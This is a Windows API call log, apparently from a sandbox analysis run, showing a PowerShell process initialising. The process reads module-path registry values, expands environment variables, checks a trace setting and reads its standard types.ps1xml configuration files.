	[0372.976] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d668 | out: phkResult=0x14d668*=0x324) returned 0x0
	[0372.976] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d5ec, lpData=0x0, lpcbData=0x14d5e8*=0x0 | out: lpType=0x14d5ec*=0x2, lpData=0x0, lpcbData=0x14d5e8*=0x6c) returned 0x0
	[0372.976] CoTaskMemAlloc (cb=0x70) returned 0x3c4320
	[0372.976] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d5bc, lpData=0x3c4320, lpcbData=0x14d5b8*=0x6c | out: lpType=0x14d5bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14d5b8*=0x6c) returned 0x0
	[0372.977] CoTaskMemFree (pv=0x3c4320) 
	[0372.977] CoTaskMemAlloc (cb=0xcc) returned 0x424c00
	[0372.977] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x424c00, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0372.977] CoTaskMemFree (pv=0x424c00) 
	[0372.977] CoTaskMemAlloc (cb=0xcc) returned 0x424c00
	[0372.977] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x424c00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0372.977] CoTaskMemFree (pv=0x424c00) 
	[0372.979] RegCloseKey (hKey=0x324) returned 0x0
	[0372.979] CoTaskMemAlloc (cb=0xcc) returned 0x424c00
	[0372.979] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x424c00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0372.979] CoTaskMemFree (pv=0x424c00) 
	[0372.980] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d668 | out: phkResult=0x14d668*=0x324) returned 0x0
	[0372.980] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d5ec, lpData=0x0, lpcbData=0x14d5e8*=0x0 | out: lpType=0x14d5ec*=0x0, lpData=0x0, lpcbData=0x14d5e8*=0x0) returned 0x2
	[0372.980] RegCloseKey (hKey=0x324) returned 0x0
	[0372.984] CoTaskMemAlloc (cb=0x20c) returned 0x417250
	[0372.985] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x417250 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0372.986] CoTaskMemFree (pv=0x417250) 
	[0372.986] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0372.987] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0372.997] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0372.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0372.997] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0373.000] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0373.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.001] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0373.006] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0373.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.006] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0373.006] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0373.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.006] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0373.008] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d458 | out: phkResult=0x14d458*=0x32c) returned 0x0
	[0373.009] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x14d46c, lpData=0x0, lpcbData=0x14d468*=0x0 | out: lpType=0x14d46c*=0x1, lpData=0x0, lpcbData=0x14d468*=0x74) returned 0x0
	[0373.010] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x14d3dc, lpData=0x0, lpcbData=0x14d3d8*=0x0 | out: lpType=0x14d3dc*=0x1, lpData=0x0, lpcbData=0x14d3d8*=0x74) returned 0x0
	[0373.010] CoTaskMemAlloc (cb=0x78) returned 0x3c4320
	[0373.010] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x14d3ac, lpData=0x3c4320, lpcbData=0x14d3a8*=0x74 | out: lpType=0x14d3ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d3a8*=0x74) returned 0x0
	[0373.010] CoTaskMemFree (pv=0x3c4320) 
	[0373.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0373.010] SetErrorMode (uMode=0x1) returned 0x1
	[0373.010] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d330 | out: lpFileInformation=0x14d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0373.010] SetErrorMode (uMode=0x1) returned 0x1
	[0373.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0373.011] SetErrorMode (uMode=0x1) returned 0x1
	[0373.011] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d330 | out: lpFileInformation=0x14d330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0373.011] SetErrorMode (uMode=0x1) returned 0x1
	[0373.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0373.014] SetErrorMode (uMode=0x1) returned 0x1
	[0373.014] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d330 | out: lpFileInformation=0x14d330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0373.014] SetErrorMode (uMode=0x1) returned 0x1
	[0373.486] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0373.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.486] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0373.488] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0373.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.488] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0373.488] GetACP () returned 0x4e4
	[0373.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0373.496] SetErrorMode (uMode=0x1) returned 0x1
	[0373.496] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0373.497] GetFileType (hFile=0x330) returned 0x1
	[0373.497] SetErrorMode (uMode=0x1) returned 0x1
	[0373.497] GetFileType (hFile=0x330) returned 0x1
	[0373.498] ReadFile (in: hFile=0x330, lpBuffer=0x2c486b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2c486b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0373.500] ReadFile (in: hFile=0x330, lpBuffer=0x2c486b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2c486b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0373.501] ReadFile (in: hFile=0x330, lpBuffer=0x2c486b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2c486b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0373.501] ReadFile (in: hFile=0x330, lpBuffer=0x2c486b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2c486b8*, lpNumberOfBytesRead=0x14d268*=0xcf3, lpOverlapped=0x0) returned 1
	[0373.501] ReadFile (in: hFile=0x330, lpBuffer=0x2c47b13, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2c47b13*, lpNumberOfBytesRead=0x14d268*=0x0, lpOverlapped=0x0) returned 1
	[0373.501] ReadFile (in: hFile=0x330, lpBuffer=0x2c486b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2c486b8*, lpNumberOfBytesRead=0x14d268*=0x0, lpOverlapped=0x0) returned 1
	[0373.503] CloseHandle (hObject=0x330) returned 1
	[0373.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0373.507] SetErrorMode (uMode=0x1) returned 0x1
	[0373.507] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d1e0 | out: lpFileInformation=0x14d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0373.507] SetErrorMode (uMode=0x1) returned 0x1
	[0373.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0373.509] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2c8 | out: phkResult=0x14d2c8*=0x330) returned 0x0
	[0373.509] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d24c, lpData=0x0, lpcbData=0x14d248*=0x0 | out: lpType=0x14d24c*=0x1, lpData=0x0, lpcbData=0x14d248*=0x56) returned 0x0
	[0373.509] CoTaskMemAlloc (cb=0x5a) returned 0x42f7f0
	[0373.509] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d21c, lpData=0x42f7f0, lpcbData=0x14d218*=0x56 | out: lpType=0x14d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d218*=0x56) returned 0x0
	[0373.509] CoTaskMemFree (pv=0x42f7f0) 
	[0373.509] RegCloseKey (hKey=0x330) returned 0x0
	[0373.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0373.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0373.955] GetSystemInfo (in: lpSystemInfo=0x14bf00 | out: lpSystemInfo=0x14bf00*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0373.956] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0374.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0374.326] SetErrorMode (uMode=0x1) returned 0x1
	[0374.326] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0374.326] GetFileType (hFile=0x32c) returned 0x1
	[0374.326] SetErrorMode (uMode=0x1) returned 0x1
	[0374.326] GetFileType (hFile=0x32c) returned 0x1
	[0374.326] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.327] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.327] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.328] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.328] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.328] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.328] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.328] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.329] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.329] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.330] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.330] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.330] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.330] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.331] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.331] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.331] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.332] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.333] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.333] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.333] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.333] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.334] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.334] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.334] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.334] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.335] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.335] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.335] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.335] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.336] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.336] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.336] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.338] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.338] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.339] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.339] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.339] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.339] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
